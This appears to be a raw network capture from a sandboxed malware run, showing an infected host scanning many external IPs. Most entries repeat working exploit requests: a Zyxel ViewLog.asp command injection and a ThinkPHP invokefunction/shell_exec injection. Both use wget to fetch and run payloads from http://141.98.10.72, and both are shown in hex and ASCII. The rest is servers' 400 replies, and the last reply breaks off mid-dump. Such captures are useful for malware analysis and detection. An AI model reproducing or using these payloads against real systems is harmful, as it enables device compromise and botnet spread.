Feb 14, 2024 09:30:59.735516071 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
249	192.168.2.15	46670	94.122.19.11	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:29.297808886 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
250	192.168.2.15	37624	94.121.122.33	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:29.297866106 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
251	192.168.2.15	57516	94.123.47.193	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:29.299700975 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
252	192.168.2.15	39722	95.86.70.128	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:29.306143999 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
253	192.168.2.15	37208	31.136.66.247	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:29.460300922 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:30.106105089 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:31.354218960 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:33.978178024 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:39.097974062 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:49.081717968 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:10.584954023 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:51.543868065 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
254	192.168.2.15	53166	112.221.133.91	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:29.476152897 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:29.790294886 CET	307	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Wed, 14 Feb 2024 08:29:29 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
255	192.168.2.15	53544	31.136.171.225	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:29.478622913 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:30.106103897 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:31.354123116 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:33.978157997 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:39.098079920 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:49.081582069 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:10.584944010 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:51.543762922 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
256	192.168.2.15	44878	112.198.55.121	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:29.505273104 CET	319	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:30.554075956 CET	319	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:32.698221922 CET	319	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:33.093050957 CET	170	IN	HTTP/1.0 400 Bad Request Server: AR Date: wed, 14 feb 2024 15:58:49 GMT Pragma: no-cache Cache-Control: no-store Content-Length: 11 Connection: Close Data Raw: 42 61 64 20 52 65 71 75 65 73 74 Data Ascii: Bad Request

Session ID	Source IP	Source Port	Destination IP	Destination Port
257	192.168.2.15	35100	31.200.101.210	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:29.545768023 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
258	192.168.2.15	34732	94.123.8.244	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:29.545969963 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
259	192.168.2.15	32936	94.122.198.28	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:29.547154903 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
260	192.168.2.15	50462	95.166.153.201	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:29.687042952 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:29.900494099 CET	605	IN	HTTP/1.1 400 Bad Request Date: Wed, 14 Feb 2024 11:22:09 GMT Server: Apache/1.3.33 (Debian GNU/Linux) PHP/5.0.4-1.dotdeb.2 mod_ssl/2.8.22 OpenSSL/0.9.7d Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 50 3e 0a 54 68 65 20 72 65 71 75 65 73 74 20 6c 69 6e 65 20 63 6f 6e 74 61 69 6e 65 64 20 69 6e 76 61 6c 69 64 20 63 68 61 72 61 63 74 65 72 73 20 66 6f 6c 6c 6f 77 69 6e 67 20 74 68 65 20 70 72 6f 74 6f 63 6f 6c 20 73 74 72 69 6e 67 2e 3c 50 3e 0a 3c 50 3e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 41 70 61 63 68 65 2f 31 2e 33 2e 33 33 20 53 65 72 76 65 72 20 61 74 20 6d 61 69 6c 2e 72 69 73 65 75 70 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>Bad Request</H1>Your browser sent a request that this server could not understand.<P>The request line contained invalid characters following the protocol string.<P><P><HR><ADDRESS>Apache/1.3.33 Server at mail.riseup.net Port 80</ADDRESS></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
261	192.168.2.15	44412	95.217.236.46	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:29.700846910 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:29.926822901 CET	351	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Wed, 14 Feb 2024 08:29:29 GMT Content-Type: text/html; charset=utf-8 Content-Length: 150 Connection: close X-Frame-Options: SAMEORIGIN Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
262	192.168.2.15	36510	95.158.244.29	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:29.717200041 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:29.959671974 CET	614	IN	HTTP/1.1 400 Bad Request Server: Mini web server 1.0 ZTE corp 2005. Accept-Ranges: bytes Connection: close Content-Type: text/html; charset=utf-8 Cache-Control: no-cache,no-store Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 48 54 4d 4c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 20 4c 49 4e 4b 3d 22 23 32 30 32 30 66 66 22 20 56 4c 49 4e 4b 3d 22 23 34 30 34 30 63 63 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 